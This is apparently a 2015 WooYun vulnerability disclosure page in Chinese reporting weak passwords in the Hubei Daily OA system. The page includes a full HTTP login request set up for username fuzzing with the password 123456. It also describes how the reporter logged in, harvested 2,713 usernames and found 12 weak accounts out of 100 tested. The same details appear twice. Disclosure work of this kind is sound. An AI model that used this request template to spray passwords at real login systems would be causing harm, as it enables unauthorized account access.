当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156216

漏洞标题:湖北日报OA系统多个弱口令可影响采编系统

相关厂商:湖北日报

漏洞作者: 路人甲

提交时间:2015-11-28 02:56

修复时间:2016-01-16 17:50

公开时间:2016-01-16 17:50

漏洞类型:后台弱口令

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-28: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

湖北日报OA系统多个弱口令

详细说明:

之前厨子发过,后来闲的没事又测了一下,结果...
http://**.**.**.**/bugs/wooyun-2010-0142772

POST /EntApp4.0/HBRB/AppPages/web/Login.aspx?type=T&deviceToken=1976fd3864fa107c2457c854915cffa66269afacddd3d73d5a095ea950ef2826&deviceGuid=D4926ACC-E2B8-44AA-87B8-F57B39BB7F82&os=ios HTTP/1.1
Host: **.**.**.**
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 (366764544)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://**.**.**.**/EntApp4.0/HBRB/AppPages/web/Login.aspx?&type=T&deviceToken=1976fd3864fa107c2457c854915cffa66269afacddd3d73d5a095ea950ef2826&deviceGuid=D4926ACC-E2B8-44AA-87B8-F57B39BB7F82&os=ios
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: ASP.NET_SessionId=lg3gf00cgyd4hhyw2aywra4z
Content-Length: 158
Origin: http://**.**.**.**
Accept-Encoding: gzip, deflate
__VIEWSTATE=%2FwEPDwUKLTIzODE4NDQ4OQ8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBZGSbiJswMcF2jtkkHIcEzjd1yVLqLQ%3D%3D&pmd5=&name=§qqq§&pwd=123456&btnLog=%E7%99%BB%E5%BD%95


500人名测试

1.png


进来之后发现没有通讯录,这咋办,不能停啊。

2.png


提取出来2713个用户名,只从中抽取100个测试下。

3.png


4.png


100个成功12个,百分之12~!

漏洞证明:

之前厨子发过,后来闲的没事又测了一下,结果...
http://**.**.**.**/bugs/wooyun-2010-0142772

POST /EntApp4.0/HBRB/AppPages/web/Login.aspx?type=T&deviceToken=1976fd3864fa107c2457c854915cffa66269afacddd3d73d5a095ea950ef2826&deviceGuid=D4926ACC-E2B8-44AA-87B8-F57B39BB7F82&os=ios HTTP/1.1
Host: **.**.**.**
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 (366764544)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://**.**.**.**/EntApp4.0/HBRB/AppPages/web/Login.aspx?&type=T&deviceToken=1976fd3864fa107c2457c854915cffa66269afacddd3d73d5a095ea950ef2826&deviceGuid=D4926ACC-E2B8-44AA-87B8-F57B39BB7F82&os=ios
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: ASP.NET_SessionId=lg3gf00cgyd4hhyw2aywra4z
Content-Length: 158
Origin: http://**.**.**.**
Accept-Encoding: gzip, deflate
__VIEWSTATE=%2FwEPDwUKLTIzODE4NDQ4OQ8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBZGSbiJswMcF2jtkkHIcEzjd1yVLqLQ%3D%3D&pmd5=&name=§qqq§&pwd=123456&btnLog=%E7%99%BB%E5%BD%95


500人名测试

1.png


进来之后发现没有通讯录,这咋办,不能停啊。

2.png


提取出来2713个用户名,只从中抽取100个测试下。

3.png


4.png


100个成功12个,百分之12~!

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-02 17:49

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发湖北分中心,由其后续协调网站管理单位处置。

最新状态:

暂无